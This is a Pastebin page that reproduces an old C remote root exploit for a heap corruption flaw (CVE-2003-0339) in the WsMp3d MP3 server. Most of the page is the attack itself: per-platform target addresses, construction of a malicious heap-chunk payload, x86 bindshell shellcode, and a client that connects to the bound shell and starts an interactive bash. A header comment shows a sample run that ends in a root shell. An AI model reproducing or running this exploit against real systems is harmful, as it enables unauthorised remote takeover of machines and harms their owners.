API tools faq
paste
Advertisement
FlyFar

WsMp3d 0.x - Remote Heap Overflow - CVE-2003-0339

FlyFar
Jan 24th, 2024
481
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 9.97 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2. **
  3. ** [*] Title: Remote Heap Corruption Overflow vulnerability in WsMp3d
  4. ** [+] Exploit: 0x82-Remote.WsMp3d.again.c
  5. **
  6. ** bash$ ./0x82--Remote.WsMp3d.again -h 61.37.xxx.xx -t2
  7. **
  8. **  WsMp3 Server Heap Corruption Remote root exploit
  9. **                                             by Xpl017Elz.
  10. **  [+] Hostname: 61.37.xxx.xx
  11. **  [+] Port num: 8000
  12. **  [+] Retloc address: 0x8058d8c
  13. **  [+] Retaddr address: 0x80648bf
  14. **  [1] #1 Set socket.
  15. **  [2] First, send exploit packet.
  16. **  [3] #2 Set socket.
  17. **  [4] Second, send exploit packet.
  18. **  [5] Waiting, executes the shell ! (3Sec)
  19. **  [6] Trying 61.37.xxx.xx:36864 ...
  20. **  [7] Connected to 61.37.xxx.xx:36864 !
  21. **
  22. **  [*] Executed shell successfully !
  23. **
  24. ** Linux xpl017elz 2.2.12-20kr #1 Tue Oct 12 17:08:15 KST 1999 i586 unknown
  25. ** uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),
  26. ** 6(disk),10(wheel)
  27. ** bash#
  28. **
  29. **
  30. */
  31.  
  32. #include <stdio.h>
  33. #include <unistd.h>
  34. #include <sys/socket.h>
  35. #include <netdb.h>
  36. #include <netinet/in.h>
  37.  
  38. struct op_plat_st
  39. {
  40.     int op_plat_num;
  41.     char *op_plat_sys;
  42.     u_long retloc;
  43.     u_long retaddr;
  44.     int off_st;
  45. };
  46. struct op_plat_st __pl_form[]=
  47. {
  48.     /*{num,linux,globl val,heap val}*/
  49.     {0,"Linux WsMp3 Binary I (Default)",0x08059490,0x08064e8f,0},
  50.     {1,"Linux WsMp3 Binary II (Default)",0x08059490,0x08063e97,0},
  51.     //08058d8c R_386_JUMP_SLOT   malloc
  52.     {2,"RedHat Linux 6.1 (Compile)",0x08058d8c,0x080648bf,0},
  53.     {3,"RedHat Linux 6.2 (Compile)",0x08058d8c,0x080646f3,0},
  54.     {4,"RedHat Linux 7.0 (Compile)",0x0809aa68,0x080a5cb3,0},
  55.     {5,"Linux all DoS (Compile)",0x82828282,0x82828282,0},
  56. /*  {6,"RedHat Linux 7.1",0x0,0x0,1},
  57.     {7,"RedHat Linux 8.0",0x0,0x82828282,1},
  58.     {8,"RedHat Linux 9.0",0x0,0x82828282,1},
  59. */
  60.     {0x82,NULL,0,0,0}
  61. };
  62.  
  63. int sexsock(char *conn_host_nm,int conn_port_nm);
  64. void start_shell(int st_sock_va);
  65. void re_connt_lm(int st_sock_va);
  66. void __xpl_banrl();
  67. void x_fp_rm_usage(char *x_fp_rm);
  68. int __eat_sucks_heap_data_send(int st_sock_va,u_long fd_sx,u_long bk_sx);
  69.  
  70. void __xpl_banrl()
  71. {
  72.     fprintf(stdout,"\n WsMp3 Server Heap Corruption Remote root exploit (Again)\n");
  73.     fprintf(stdout,"                                            by Xpl017Elz.\n");
  74. }
  75.  
  76. void x_fp_rm_usage(char *x_fp_rm)
  77. {
  78.     int __t_xmp=0;
  79.     fprintf(stdout,"\n Usage: %s -[option] [arguments]\n\n",x_fp_rm);
  80.     fprintf(stdout,"\t -h [hostname] - target host.\n");
  81.     fprintf(stdout,"\t -p [port]     - port number.\n");
  82.     fprintf(stdout,"\t -r [addr]     - retloc address. (malloc globl)\n");
  83.     fprintf(stdout,"\t -s [addr]     - &shellcode address.\n\n");
  84.     fprintf(stdout," Example> %s -h target_hostname -p 8000\n",x_fp_rm);
  85.     fprintf(stdout," Select target number>\n\n");
  86.     for(;;)
  87.     {
  88.         if(__pl_form[__t_xmp].op_plat_num==(0x82))
  89.             break;
  90.         else
  91.         {
  92.            
  93. fprintf(stdout,"\t {%d} %s\n",__pl_form[__t_xmp].op_plat_num,__pl_form[__t_xmp].op_plat_sys);
  94.         }
  95.         __t_xmp++;
  96.     }
  97.     fprintf(stdout,"\n");
  98.     exit(0);
  99. }
  100.  
  101. /*
  102. ** name: desc->action (free)
  103. ** content: chat cmd ("CHA")
  104. ** content size: 3
  105. ** buffer size: 4+12 (Bin:1000[0])
  106. **
  107. ** name: desc->what
  108. ** content: garbage (clear)
  109. ** content size: 1024
  110. ** buffer size: 4+4+1+1024 (Bin:1000000100[1])
  111. */
  112.  
  113. int __eat_sucks_heap_data_send(int st_sock_va,u_long fd_sx,u_long bk_sx)
  114. {
  115.     int wy_clean_data_q;
  116.     char nop_n_jump[]={0x42,0x0c,0xeb,0x41};
  117.     int atk_buf_pos=0;
  118.     char oxa_oxd[]={0x0a,0x0d};
  119. #define PORT_Q (36864)
  120. #define __CLN_DT_LEN ((0x00000400)+(0x00000001))
  121.     char step_atk_code_st[PORT_Q];
  122. #define __OF_BY_ONE (0x01)
  123.     char p_rev_size[]={0xfc,0xff,0xff,0xff}; /* chunk size */
  124.     char __size_fd[]={0xff,0xff,0xff,0xff}; /* data section size */
  125.     char cln_dt_buf[__CLN_DT_LEN];
  126.     char chat_inf_send_code[]={0x43,0x48,0x41};
  127.     char shellcode[]={
  128.         /* bindshell port 36864 */
  129.         0xeb,0x72,0x5e,0x29,0xc0,0x89,0x46,0x10,
  130.         0x40,0x89,0xc3,0x89,0x46,0x0c,0x40,0x89,
  131.         0x46,0x08,0x8d,0x4e,0x08,0xb0,0x66,0xcd,
  132.         0x80,0x43,0xc6,0x46,0x10,0x10,0x66,0x89,
  133.         0x5e,0x14,0x88,0x46,0x08,0x29,0xc0,0x89,
  134.         0xc2,0x89,0x46,0x18,0xb0,0x90,0x66,0x89,
  135.         0x46,0x16,0x8d,0x4e,0x14,0x89,0x4e,0x0c,
  136.         0x8d,0x4e,0x08,0xb0,0x66,0xcd,0x80,0x89,
  137.         0x5e,0x0c,0x43,0x43,0xb0,0x66,0xcd,0x80,
  138.         0x89,0x56,0x0c,0x89,0x56,0x10,0xb0,0x66,
  139.         0x43,0xcd,0x80,0x86,0xc3,0xb0,0x3f,0x29,
  140.         0xc9,0xcd,0x80,0xb0,0x3f,0x41,0xcd,0x80,
  141.         0xb0,0x3f,0x41,0xcd,0x80,0x88,0x56,0x07,
  142.         0x89,0x76,0x0c,0x87,0xf3,0x8d,0x4b,0x0c,
  143.         0xb0,0x0b,0xcd,0x80,0xe8,0x89,0xff,0xff,
  144.         0xff,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68
  145.     };
  146.     int send_shcode_lsz=sizeof(shellcode);
  147.  
  148.     memset((char *)cln_dt_buf,0x82,sizeof(cln_dt_buf));
  149.     memset((char *)step_atk_code_st,0,sizeof(step_atk_code_st));
  150.     /*
  151.     desc->action:malloc(10); // cleanup
  152.     */
  153.     memcpy(step_atk_code_st+atk_buf_pos,chat_inf_send_code,sizeof(chat_inf_send_code));
  154.     atk_buf_pos+=(sizeof(chat_inf_send_code));
  155.     memset(step_atk_code_st+atk_buf_pos,0x20,__OF_BY_ONE);
  156.     atk_buf_pos+=(__OF_BY_ONE);
  157.     /*
  158.     void rem_req_descriptor(req_descriptor *desc);
  159.     desc->what[sizeof(desc->what)]='\0';free(desc->what);desc->what=NULL;
  160.     */
  161.     memcpy(step_atk_code_st+atk_buf_pos,cln_dt_buf,sizeof(cln_dt_buf));
  162.     atk_buf_pos+=(sizeof(cln_dt_buf));
  163.     /* chunk size */
  164.     memcpy(step_atk_code_st+atk_buf_pos,p_rev_size,sizeof(p_rev_size));
  165.     atk_buf_pos+=(sizeof(p_rev_size));
  166.     /* data section size */
  167.     memcpy(step_atk_code_st+atk_buf_pos,__size_fd,sizeof(__size_fd));
  168.     atk_buf_pos+=(sizeof(__size_fd));
  169.     {
  170.         *(long *)&step_atk_code_st[atk_buf_pos]=(fd_sx-(0x0c));
  171.         atk_buf_pos+=4; /* forward ptr */
  172.         *(long *)&step_atk_code_st[atk_buf_pos]=(bk_sx);
  173.         atk_buf_pos+=4; /* back ptr */
  174.     }
  175.     memset(step_atk_code_st+atk_buf_pos,0x20,__OF_BY_ONE);
  176.     atk_buf_pos+=(__OF_BY_ONE);
  177.     for(wy_clean_data_q=0;wy_clean_data_q<0x190;wy_clean_data_q+=4)
  178.     {
  179.         memcpy(step_atk_code_st+atk_buf_pos,nop_n_jump,sizeof(nop_n_jump));
  180.         atk_buf_pos+=(sizeof(nop_n_jump));
  181.     }
  182.     memcpy(step_atk_code_st+atk_buf_pos,shellcode,sizeof(shellcode));
  183.     atk_buf_pos+=(sizeof(shellcode));
  184.     memcpy(step_atk_code_st+atk_buf_pos,oxa_oxd,sizeof(oxa_oxd));
  185.     atk_buf_pos+=(sizeof(oxa_oxd));
  186.  
  187.     send(st_sock_va,step_atk_code_st,strlen(step_atk_code_st),0);
  188.     return(st_sock_va);
  189. }
  190.  
  191. int main(int argc,char *argv[])
  192. {
  193.     int sock,tg_sk;
  194. #define D_PORT (8000)
  195. #define ATK_CPT (36864)
  196.     int port=(D_PORT);
  197. #define D_HOST "x82.inetcop.org"
  198.     char hostname[0x82]=D_HOST;
  199.     int whlp,type=0;
  200.  
  201.     u_long retloc=__pl_form[type].retloc;
  202.     u_long retaddr=__pl_form[type].retaddr;
  203.  
  204.     (void)__xpl_banrl();
  205.     while((whlp=getopt(argc,argv,"T:t:R:r:S:s:H:h:P:p:IiXx"))!=EOF)
  206.     {
  207.         extern char *optarg;
  208.         switch(whlp)
  209.         {
  210.             case 'T':
  211.             case 't':
  212.                 if((type=atoi(optarg))<6)
  213.                 {
  214.                     retloc=__pl_form[type].retloc;
  215.                     retaddr=__pl_form[type].retaddr;
  216.                 }
  217.                 else (void)x_fp_rm_usage(argv[0]);
  218.                 break;
  219.  
  220.             case 'R':
  221.             case 'r':
  222.                 retloc=strtoul(optarg,NULL,0);
  223.                 break;
  224.                
  225.             case 'S':
  226.             case 's':
  227.                 retaddr=strtoul(optarg,NULL,0);
  228.                 break;
  229.                
  230.             case 'H':
  231.             case 'h':
  232.                 memset((char *)hostname,0,sizeof(hostname));
  233.                 strncpy(hostname,optarg,sizeof(hostname)-1);
  234.                 break;
  235.                
  236.             case 'P':
  237.             case 'p':
  238.                 port=atoi(optarg);
  239.                 break;
  240.                
  241.             case 'I':
  242.             case 'i':
  243.                 fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
  244.                 exit(-1);
  245.                
  246.             case '?':
  247.                 (void)x_fp_rm_usage(argv[0]);
  248.                 break;
  249.         }
  250.     }
  251.    
  252.     if(!strcmp(hostname,D_HOST))
  253.     {
  254.         (void)x_fp_rm_usage(argv[0]);
  255.     }
  256.     {
  257.         fprintf(stdout," [+] Hostname: %s\n",hostname);
  258.         fprintf(stdout," [+] Port num: %d\n",port);
  259.         fprintf(stdout," [+] Retloc address: %p\n",retloc);
  260.         fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
  261.     }
  262.     fprintf(stdout," [1] #1 Set socket.\n");
  263.     sock=(int)sexsock(hostname,port);
  264.     (void)re_connt_lm(sock);
  265.    
  266.     fprintf(stdout," [2] First, send exploit packet.\n");
  267.     sock=(int)__eat_sucks_heap_data_send(sock,retloc,retaddr);
  268.     close(sock);
  269.    
  270.     fprintf(stdout," [3] #2 Set socket.\n");
  271.     sock=(int)sexsock(hostname,port);
  272.     (void)re_connt_lm(sock);
  273.    
  274.     fprintf(stdout," [4] Second, send exploit packet.\n");
  275.     sock=(int)__eat_sucks_heap_data_send(sock,retloc,retaddr);
  276.    
  277.     fprintf(stdout," [5] Waiting, executes the shell ! (3Sec)\n");
  278.     sleep(3);
  279.    
  280.     fprintf(stdout," [6] Trying %s:%d ...\n",hostname,(ATK_CPT));
  281.     tg_sk=(int)sexsock(hostname,(ATK_CPT));
  282.     (void)re_connt_lm(tg_sk);
  283.  
  284.     fprintf(stdout," [7] Connected to %s:%d !\n\n",hostname,(ATK_CPT));
  285.     (void)start_shell(tg_sk);
  286.  
  287.     exit(0);
  288. }
  289.  
  290. int sexsock(char *conn_host_nm,int conn_port_nm)
  291. {
  292.     int sock;
  293.     struct hostent *sxp;
  294.     struct sockaddr_in sxp_addr;
  295.  
  296.     if((sxp=gethostbyname(conn_host_nm))==NULL)
  297.     {
  298.         herror(" [-] gethostbyname() error");
  299.         return(-1);
  300.     }
  301.     if((sock=socket(AF_INET,SOCK_STREAM,0))==-1)
  302.     {
  303.         perror(" [-] socket() error");
  304.         return(-1);
  305.     }
  306.     sxp_addr.sin_family=AF_INET;
  307.     sxp_addr.sin_port=htons(conn_port_nm);
  308.     sxp_addr.sin_addr=*((struct in_addr*)sxp->h_addr);
  309.     bzero(&(sxp_addr.sin_zero),8);
  310.  
  311.     if(connect(sock,(struct sockaddr *)&sxp_addr,sizeof(struct sockaddr))==-1)
  312.     {
  313.         perror(" [-] connect() error");
  314.         return(-1);
  315.     }
  316.  
  317.     return(sock);
  318. }
  319.  
  320. void start_shell(int st_sock_va)
  321. {
  322.     int died;
  323.     char *command="uname -a; id; export TERM=vt100; exec bash -i\n";
  324.     char readbuf[1024];
  325.     fd_set rset;
  326.     memset((char *)readbuf,0,sizeof(readbuf));
  327.     fprintf(stdout," [*] Executed shell successfully !\n\n");
  328.     send(st_sock_va,command,strlen(command),0);
  329.  
  330.     for(;;)
  331.     {
  332.         fflush(stdout);
  333.         FD_ZERO(&rset);
  334.         FD_SET(st_sock_va,&rset);
  335.         FD_SET(STDIN_FILENO,&rset);
  336.         select(st_sock_va+1,&rset,NULL,NULL,NULL);
  337.  
  338.         if(FD_ISSET(st_sock_va,&rset))
  339.         {
  340.             died=read(st_sock_va,readbuf,sizeof(readbuf)-1);
  341.             if(died<=0)
  342.                 exit(0);
  343.             readbuf[died]=0;
  344.             fprintf(stdout,"%s",readbuf);
  345.         }
  346.         if(FD_ISSET(STDIN_FILENO,&rset))
  347.         {
  348.             died=read(STDIN_FILENO,readbuf,sizeof(readbuf)-1);
  349.             if(died>0)
  350.             {
  351.                 readbuf[died]=0;
  352.                 write(st_sock_va,readbuf,died);
  353.             }
  354.         }
  355.     }
  356.     return;
  357. }
  358.  
  359. void re_connt_lm(int st_sock_va)
  360. {
  361.     if(st_sock_va==-1)
  362.     {
  363.         fprintf(stdout," [-] Failed.\n\n");
  364.         fprintf(stdout," Happy Exploit ! :-)\n\n");
  365.         exit(-1);
  366.     }
  367. }
  368.  
  369.  
  370. // milw0rm.com [2003-05-22]
  371.            
Tags: Exploit CVE Vulnerability
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!